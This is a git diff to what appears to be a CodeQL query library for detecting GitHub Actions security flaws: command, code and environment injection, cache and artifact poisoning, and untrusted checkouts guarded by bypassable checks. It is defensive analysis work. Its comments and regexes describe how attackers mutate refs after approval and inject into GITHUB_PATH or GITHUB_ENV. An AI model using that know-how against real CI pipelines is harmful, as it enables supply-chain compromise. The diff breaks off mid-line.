.../Security/CWE-077/EnvVarInjectionMedium.ql | 18 ++--- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-078/CommandInjectionMedium.ql | 5 +- .../Security/CWE-094/CodeInjectionCritical.ql | 7 +- .../Security/CWE-094/CodeInjectionMedium.ql | 6 +- ql/src/Security/CWE-349/CachePoisoning.ql | 5 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 13 ++-- .../UntrustedCheckoutTOCTOUCritical.ql | 33 ++------ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 35 ++------- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningMedium.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 7 +- .../CWE-367/.github/workflows/comment.yml | 37 +++++++-- .../UntrustedCheckoutTOCTOUCritical.expected | 18 ++--- .../CWE-829/.github/workflows/test5.yml | 68 ++++++++++++++++ .../CWE-829/.github/workflows/test6.yml | 45 +++++++++++ .../UntrustedCheckoutCritical.expected | 13 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 29 files changed, 391 insertions(+), 181 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5e7c6d77c3e6..0662f100fe42 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -287,13 +287,21 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpressionImpl { + string getAccessPath() { result = super.getAccessPath() } + + string getInnerExpression() { result = super.getInnerExpression() } +} + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } -class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { + string getNeededJobId() { result = super.getNeededJobId() } +} class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 72dc7bf16878..3c7091d2a85d 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +private import codeql.actions.security.ControlChecks bindingset[expr] string normalizeExpr(string expr) { @@ -215,6 +216,20 @@ predicate inPrivilegedCompositeAction(AstNode node) { ) } +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() and + not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + ) +} + +predicate inPrivilegedContext(AstNode node) { + inPrivilegedCompositeAction(node) + or + inPrivilegedExternallyTriggerableJob(node) +} + predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and @@ -222,13 +237,6 @@ predicate inNonPrivilegedCompositeAction(AstNode node) { ) } -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - predicate inNonPrivilegedJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and @@ -236,6 +244,12 @@ predicate inNonPrivilegedJob(AstNode node) { ) } +predicate inNonPrivilegedContext(AstNode node) { + inNonPrivilegedCompositeAction(node) + or + inNonPrivilegedJob(node) +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -244,5 +258,9 @@ predicate outputsPartialFileContent(string snippet) { // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH snippet - .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) + .regexpMatch([ + "(\\$\\(|`)<.*", + ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + + ".*" + ]) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c7c6216b1b7..bb31e198cc62 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1230,6 +1230,18 @@ string getAJsonReferenceExpression(string s, int offset) { 2) } +bindingset[s] +string getAJsonReferenceAccessPath(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*)", + 3) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability @@ -1245,6 +1257,20 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { abstract AstNodeImpl getTarget(); } +class JsonReferenceExpressionImpl extends ExpressionImpl { + string innerExpression; + string accessPath; + + JsonReferenceExpressionImpl() { + innerExpression = getAJsonReferenceExpression(expression, _) and + accessPath = getAJsonReferenceAccessPath(expression, _) + } + + string getInnerExpression() { result = innerExpression } + + string getAccessPath() { result = accessPath } +} + private string stepsCtxRegex() { result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } @@ -1359,6 +1385,8 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { ) } + string getNeededJobId() { result = neededJob.getId() } + override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 28bc938f8c8e..ec7e0ad05984 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -8,6 +8,12 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep } + predicate protects(Step step, Event event) { + event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + this.getAProtectedEvent() = event.getName() and + this.dominates(step) + } + predicate dominates(Step step) { this instanceof If and ( @@ -26,22 +32,83 @@ abstract class ControlCheck extends AstNode { or this.(UsesStep).getAFollowingStep() = step } + + abstract string getAProtectedEvent(); + + abstract boolean protectsAgainstRefMutationAttacks(); +} + +abstract class AssociationCheck extends ControlCheck { + // checks who you are (identity) + // association checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } +} + +abstract class ActorCheck extends ControlCheck { + // checks who you are (identity) + // actor checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } } -abstract class AssociationCheck extends ControlCheck { } +abstract class RepositoryCheck extends ControlCheck { + // repository checks are effective against pull requests since they can control where the code is coming from + // they are not effective against issue_comment since the repository will always be the same + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class ActorCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class RepositoryCheck extends ControlCheck { } +abstract class PermissionCheck extends ControlCheck { + // permission checks are effective against pull requests since they can control who can make changes + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class LabelCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class PermissionCheck extends ControlCheck { } + +abstract class LabelCheck extends ControlCheck { + // does it protect injection attacks but not pwn requests? + // pwn requests are susceptible to checkout of mutable code + // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things + // they do actually protext against untrusted code execution (sha) + // what you have (approval) + // TODO: A check should be a combination of: + // - event type (pull_request, issue_comment, etc) + // - category (untrusted mutable code, untrusted immutable code, code injection, etc) + // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects + // - we can decide if a control check is effective based only on the ast node + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } +} class EnvironmentCheck extends ControlCheck instanceof Environment { + // Environment checks are not effective against any mutable attacks + // they do actually protext against untrusted code execution (sha) + // what you have (approval) EnvironmentCheck() { any() } + + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } } +/* Specific implementations of control checks */ + class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index c228965736da..dc0f3876f86f 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,8 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) ) } @@ -42,7 +43,7 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { EnvVarInjectionFromFileReadRunStep() { - exists(string content, string value| + exists(string content, string value | writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and outputsPartialFileContent(value) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fcccc5d8a14a..8187bca9f049 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -116,6 +116,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "branch", "ref"] + "%") or + e.getInnerExpression().matches("%." + ["head", "branch", "ref"] + "%") + ) + ) ) } } @@ -150,6 +166,22 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "sha", "commit"] + "%") or + e.getInnerExpression().matches("%." + ["head", "sha", "commit"] + "%") + ) + ) ) } } diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index fc96c3d43538..4ff86eb0fbde 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and - ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink - or - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index cc067598c893..7ca8f4a28382 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvPathInjectionFromFileReadSink - ) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 4b0799ca4410..320feb4e1335 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -16,25 +16,17 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and - // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 7eb239e83a06..bccb61ae6ea6 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -16,24 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 2c2ab2f2af5b..689424782842 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -19,11 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 072ebbc8dced..5feacedc40bf 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -19,10 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 3b968ceaf138..f37c374658ae 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,15 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and + inPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index abecaf997c6b..43f4eb9c38a2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,14 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) and + inNonPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index f202b1fcecf7..607a13e142c0 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } @@ -23,6 +24,8 @@ where j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -51,4 +54,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 030dd872cb28..e7f1385f3cda 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -16,12 +16,19 @@ import actions import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -32,11 +39,7 @@ where caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) - ) and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() + ) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index d28cca11a569..bbbab7bcab70 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -22,37 +22,14 @@ from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is followed by a known poisonable step + // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the mutable checkout step is protected by an access check + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 6448f1a05a85..b9b3154debfc 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,37 +16,18 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and - // the mutable checkout step is protected by an access check + // the checkout occurs in a privileged context + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index a7d2518564de..82c6f936c51f 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -14,15 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql index a4fb958b7f96..992b2aa8c5d4 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -14,14 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index c1d72dd46648..a0da81bde22a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -27,11 +27,5 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 468a1214c62d..dba0dadb61bf 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -25,11 +25,5 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in 